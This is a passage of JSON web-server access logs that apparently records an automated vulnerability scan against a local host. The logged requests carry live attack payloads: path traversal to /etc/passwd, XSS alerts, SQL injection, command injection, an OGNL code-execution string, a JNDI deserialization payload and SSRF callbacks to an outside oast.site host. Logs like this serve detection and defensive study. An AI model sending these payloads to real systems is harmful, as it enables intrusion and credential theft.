+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?v=d&p=%22;alert(document.domain);%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999))) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /language/lang HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"more=0&host=0&username=admin&password=admin&db=&lang=en_us&expire=3","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?action=login.index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"127.0.0.1/index.php?action=login.index", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /./../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apps HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/smoosh-status.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"op=login&username=;`cat /etc/passwd`&password=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"127.0.0.1/module/login/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"----------------------------835846770881083140190633\x0D\x0AContent-Disposition: form-data; name=\x22editormd-image-file\x22; filename=\x22test.<>php\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0A\x0D\x0A----------------------------835846770881083140190633--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?s=/home/page/uploadImg HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /monitorix-cgi/monitorix.cgi?mode=localhost&graph=all&when=1day HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xampp/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apiclient/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /domcfg.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /haproxy-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/componentutils/login.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /./../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/snyk.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /proxy.stream?origin=http://ca281d8smpvb9r2g07h0fftsc79ucnzug.oast.site HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /health HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/qards/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?g=g&m=Door&a=index&content= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/componentutils/login.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //netcore_get.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"USERNAME=student&PASSWORD=student@123&language=en&log=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca281d8smpvb9r2g07h03z8s96s4cr3s9.oast.site/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://ca281d8smpvb9r2g07h01wh8k38uyxbw4.oast.site HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/health HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /autodiscover/autodiscover.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like 